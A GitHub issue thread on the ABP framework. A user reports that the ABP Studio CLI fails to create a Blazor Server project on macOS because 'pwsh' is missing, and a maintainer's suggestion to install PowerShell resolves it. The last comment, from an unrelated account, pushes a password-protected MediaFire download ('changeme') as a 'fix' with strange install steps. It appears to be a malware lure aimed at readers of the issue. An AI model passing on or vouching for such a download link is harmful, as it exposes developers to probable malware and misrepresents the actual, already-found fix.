### ISSUE TITLE
ABP Studio CLI Failed to create a new project with blazor-server

### ISSUE THREAD

**Issue by s1092958** [abpframework/abp#20641]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Description

While abp new CLI Installing client side libraries will failed to start a process with file path 'pwsh' on Macbook Air M1 and Macbook Pro Intel processor.
![image](https://github.com/user-attachments/assets/0e541bb9-1242-4500-9973-8ed8293ad8e9)
As per error message below
`✅ Installing client side libraries
System.ComponentModel.Win32Exception: Failed to start a process with file path 'pwsh'. Target file or working 
directory doesn't exist, or the provided credentials are invalid.
     System.ComponentModel.Win32Exception: An error occurred trying to start process 'pwsh' with working         
     directory '/Users/xxxx/Downloads/Tutorial/BookStore/src/BookStore.Blazor'. No such file or directory     
       at bool System.Diagnostics.Process.ForkAndExecProcess(ProcessStartInfo startInfo, string resolvedFilename,
          string[] argv, string[] envp, string cwd, bool setCredentials, uint userId, uint groupId, uint[] groups
          , out int stdinFd, out int stdoutFd, out int stderrFd, bool usesTerminal, bool throwOnNoExec)          
       at bool System.Diagnostics.Process.StartCore(ProcessStartInfo startInfo)                                  
       at void CliWrap.Utils.ProcessEx.Start() in /_/CliWrap/Utils/ProcessEx.cs:56                               
  at void CliWrap.Utils.ProcessEx.Start() in /_/CliWrap/Utils/ProcessEx.cs:68                                    
  at CommandTask<CommandResult> CliWrap.Command.ExecuteAsync(CancellationToken forcefulCancellationToken,        
     CancellationToken gracefulCancellationToken) in /_/CliWrap/Command.Execution.cs:307                         
  at CommandTask<BufferedCommandResult> CliWrap.Buffered.BufferedCommandExtensions.ExecuteBufferedAsync(Command  
     command, Encoding standardOutputEncoding, Encoding standardErrorEncoding, CancellationToken                 
     forcefulCancellationToken, CancellationToken gracefulCancellationToken) in /_/CliWrap/Buffered/             
     BufferedCommandExtensions.cs:43                                                                             
  at async Task Volo.Abp.Studio.Extensions.StandardTemplates.App.Steps.AppGenerateCertificateStep.JOMO9wQwwS(    
     object  , object  )                                                                                         
  at void                                                                                                        
     Volo.Abp.Studio.Extensions.StandardTemplates.App.Steps.AppGenerateCertificateStep.<>c__DisplayClass0_0.tbgRB
     lqgAN3yWo8S8Jh.MoveNext()                                                                                   
  at void Volo.Abp.Studio.Cli.Services.CliAsyncTaskService.<>c__DisplayClass0_0.sqDtV2mleKHMyRSh5fR.MoveNext()   
  at void Spectre.Console.Status.<>c__DisplayClass16_0.<<StartAsync>b__0>d.MoveNext() in                         
     /_/src/Spectre.Console/Live/Status/Status.cs:79                                                             
  at void Spectre.Console.Status.<>c__DisplayClass17_0`1.<<StartAsync>b__0>d.MoveNext() in                       
     /_/src/Spectre.Console/Live/Status/Status.cs:120                                                            
  at void Spectre.Console.Progress.<>c__DisplayClass32_0`1.<<StartAsync>b__0>d.MoveNext() in                     
     /_/src/Spectre.Console/Live/Progress/Progress.cs:138                                                        
  at async Task<T> Spectre.Console.Internal.DefaultExclusivityMode.RunAsync<T>(Func<Task<T>> func) in            
     /_/src/Spectre.Console/Internal/DefaultExclusivityMode.cs:40                                                
  at async Task<T> Spectre.Console.Progress.StartAsync<T>(Func<ProgressContext, Task<T>> action) in              
     /_/src/Spectre.Console/Live/Progress/Progress.cs:121                                                        
  at async Task<T> Spectre.Console.Status.StartAsync<T>(string status, Func<StatusContext, Task<T>> func) in     
     /_/src/Spectre.Console/Live/Status/Status.cs:117                                                            
  at async Task Spectre.Console.Status.StartAsync(string status, Func<StatusContext, Task> action) in            
     /_/src/Spectre.Console/Live/Status/Status.cs:77                                                             
  at async Task Volo.Abp.Studio.Cli.Services.CliAsyncTaskService.AddTaskAsync(AsyncTask asyncTask, string info,  
     Guid? taskModelId, bool isGlobal)                                                                           
  at async Task Volo.Abp.Studio.Extensions.StandardTemplates.App.Steps.AppGenerateCertificateStep.ExecuteAsync(  
     SolutionBuildPipelineContext context)                                                                       
  at async Task Volo.Abp.Studio.SolutionTemplates.Pipelines.PipelinedTemplateSolutionBuilderBase.ag72WyiVpS(     
     List<SolutionBuildPipelineStep>  , object  )                                                                
  at async Task<string> Volo.Abp.Studio.SolutionTemplates.Pipelines.PipelinedTemplateSolutionBuilderBase.        
     BuildAsync(SolutionBuilderContext context)                                                                  
  at async Task<string> Volo.Abp.Studio.SolutionTemplates.SolutionBuilder.BuildAsync(SolutionBuilderContext      
     context)                                                                                                    
  at async Task Volo.Abp.Studio.Cli.Commands.NewSolutionCommand.ExecuteAsync(CommandLineArgs commandLineArgs)    
  at async Task Volo.Abp.Studio.Cli.StudioCliService.RunInternalAsync(CommandLineArgs commandLineArgs)           
  at async Task Volo.Abp.Studio.Cli.StudioCliService.RunAsync(string[] args)                                     
Unhandled exception. System.ComponentModel.Win32Exception (2): Failed to start a process with file path 'pwsh'. Target file or working directory doesn't exist, or the provided credentials are invalid. ---> System.ComponentModel.Win32Exception (2): An error occurred trying to start process 'pwsh' with working directory '/Users/xxxx/Downloads/Tutorial/BookStore/src/BookStore.Blazor'. No such file or directory
   at System.Diagnostics.Process.ForkAndExecProcess(ProcessStartInfo startInfo, String resolvedFilename, String[] argv, String[] envp, String cwd, Boolean setCredentials, UInt32 userId, UInt32 groupId, UInt32[] groups, Int32& stdinFd, Int32& stdoutFd, Int32& stderrFd, Boolean usesTerminal, Boolean throwOnNoExec)
   at System.Diagnostics.Process.StartCore(ProcessStartInfo startInfo)
   at CliWrap.Utils.ProcessEx.Start() in /_/CliWrap/Utils/ProcessEx.cs:line 56
   at CliWrap.Utils.ProcessEx.Start() in /_/CliWrap/Utils/ProcessEx.cs:line 68
   at CliWrap.Command.ExecuteAsync(CancellationToken forcefulCancellationToken, CancellationToken gracefulCancellationToken) in /_/CliWrap/Command.Execution.cs:line 307
   at CliWrap.Buffered.BufferedCommandExtensions.ExecuteBufferedAsync(Command command, Encoding standardOutputEncoding, Encoding standardErrorEncoding, CancellationToken forcefulCancellationToken, CancellationToken gracefulCancellationToken) in /_/CliWrap/Buffered/BufferedCommandExtensions.cs:line 43
   at Volo.Abp.Studio.Extensions.StandardTemplates.App.Steps.AppGenerateCertificateStep.JOMO9wQwwS(Object  , Object  )
   at Volo.Abp.Studio.Extensions.StandardTemplates.App.Steps.AppGenerateCertificateStep.<>c__DisplayClass0_0.tbgRBlqgAN3yWo8S8Jh.MoveNext()
--- End of stack trace from previous location ---
   at Volo.Abp.Studio.Cli.Services.CliAsyncTaskService.<>c__DisplayClass0_0.sqDtV2mleKHMyRSh5fR.MoveNext()
--- End of stack trace from previous location ---
   at Spectre.Console.Status.<>c__DisplayClass16_0.<<StartAsync>b__0>d.MoveNext() in /_/src/Spectre.Console/Live/Status/Status.cs:line 79
--- End of stack trace from previous location ---
   at Spectre.Console.Status.<>c__DisplayClass17_0`1.<<StartAsync>b__0>d.MoveNext() in /_/src/Spectre.Console/Live/Status/Status.cs:line 120
--- End of stack trace from previous location ---
   at Spectre.Console.Progress.<>c__DisplayClass32_0`1.<<StartAsync>b__0>d.MoveNext() in /_/src/Spectre.Console/Live/Progress/Progress.cs:line 138
--- End of stack trace from previous location ---
   at Spectre.Console.Internal.DefaultExclusivityMode.RunAsync[T](Func`1 func) in /_/src/Spectre.Console/Internal/DefaultExclusivityMode.cs:line 40
   at Spectre.Console.Progress.StartAsync[T](Func`2 action) in /_/src/Spectre.Console/Live/Progress/Progress.cs:line 121
   at Spectre.Console.Status.StartAsync[T](String status, Func`2 func) in /_/src/Spectre.Console/Live/Status/Status.cs:line 117
   at Spectre.Console.Status.StartAsync(String status, Func`2 action) in /_/src/Spectre.Console/Live/Status/Status.cs:line 77
   at Volo.Abp.Studio.Cli.Services.CliAsyncTaskService.AddTaskAsync(AsyncTask asyncTask, String info, Nullable`1 taskModelId, Boolean isGlobal)
   at Volo.Abp.Studio.Extensions.StandardTemplates.App.Steps.AppGenerateCertificateStep.ExecuteAsync(SolutionBuildPipelineContext context)
   at Volo.Abp.Studio.SolutionTemplates.Pipelines.PipelinedTemplateSolutionBuilderBase.ag72WyiVpS(List`1  , Object  )
   at Volo.Abp.Studio.SolutionTemplates.Pipelines.PipelinedTemplateSolutionBuilderBase.BuildAsync(SolutionBuilderContext context)
   at Volo.Abp.Studio.SolutionTemplates.SolutionBuilder.BuildAsync(SolutionBuilderContext context)
   at Volo.Abp.Studio.Cli.Commands.NewSolutionCommand.ExecuteAsync(CommandLineArgs commandLineArgs)
   at Volo.Abp.Studio.Cli.StudioCliService.RunInternalAsync(CommandLineArgs commandLineArgs)
   at Volo.Abp.Studio.Cli.StudioCliService.RunAsync(String[] args)
   at Volo.Abp.Studio.Cli.Program.x2J81t685(Object  )
   at Volo.Abp.Studio.Cli.Program.<Main>(String[] args)
zsh: abort      abp new BookStore -u blazor-server -dbms SQLite -m none --theme leptonx-lite`

### Reproduction Steps

1. This is my dotnet version and I install it by brew
![image](https://github.com/user-attachments/assets/92b04718-9372-49b3-b1e9-ec429ae98f9d)
2. This is my Abp Studio Cli version
![截圖 2024-08-27 11 47 13](https://github.com/user-attachments/assets/728d027d-68eb-4d82-90ee-94c1ccfe0747)
3. Follow the latest CLI command to create ABP project
<img width="1197" alt="image" src="https://github.com/user-attachments/assets/36d0ff02-6a9a-4e9c-b004-bada8b140f59">
4. Error occurs
![image](https://github.com/user-attachments/assets/5d6e5413-b072-4469-a5d5-9fc6ed74d539)

### Version

0.7.8

### User Interface

Blazor Server

### Database Provider

EF Core (Default)

### Tiered or separate authentication server

Tiered

### Operation System

macOS

**Comment by maliming** [comment]
> Failed to start a process with file path 'pwsh'. 

Can you try to install the power shell in your MacOS?

https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4

**Comment by s1092958** [comment]
Yup. There is the PowerShell issue.
![image](https://github.com/user-attachments/assets/c937be5c-8d88-4ab0-9980-c6ef63135b05)
Thank you @maliming .

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
